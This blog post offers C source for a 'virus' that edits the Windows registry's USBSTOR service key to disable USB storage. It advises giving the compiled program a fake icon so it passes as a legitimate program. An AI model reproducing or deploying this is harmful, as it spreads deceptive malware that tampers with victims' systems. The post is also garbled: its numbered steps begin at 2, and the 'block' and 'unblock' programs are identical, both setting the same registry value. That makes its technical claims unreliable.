Disable USB Ports : Virus Source Code
In this post I will show how to create a
simple virus that disables/blocks the USB ports on the computer (PC).
As usual I use my favorite C programming language to create this virus.
Anyone with a basic knowledge of C language should be able to understand
the working of this virus program.
Once this virus is executed it
will immediately disable all the USB ports on the computer. As a result
the you’ll will not be able to use your pen drive or any other USB
peripheral on the computer. The source code for this virus is available
for download. You can test this virus on your own computer without any
worries since I have also given a program to re-enable all the USB
ports.
#include<stdio.h>
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}
2. Again Copy the below Given Code in Notepad & Save it as "unblock_usb.c"
#include<stdio.h>
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}
3. Compile the Above two saved files using a C Compiler before you can run it.
4. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
5. To test this virus, just run the block_usb.exe file
and insert a USB pen drive (thumb drive). Now you can see that your pen
drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
6. You can also change the icon of
this file to make it look like a legitimate program.
Hope you would have Liked it. Do post back your comments over it. :) :)
Posted By :- |-|A|_F B|_00d Pr|nCe
0 comments:
Post a Comment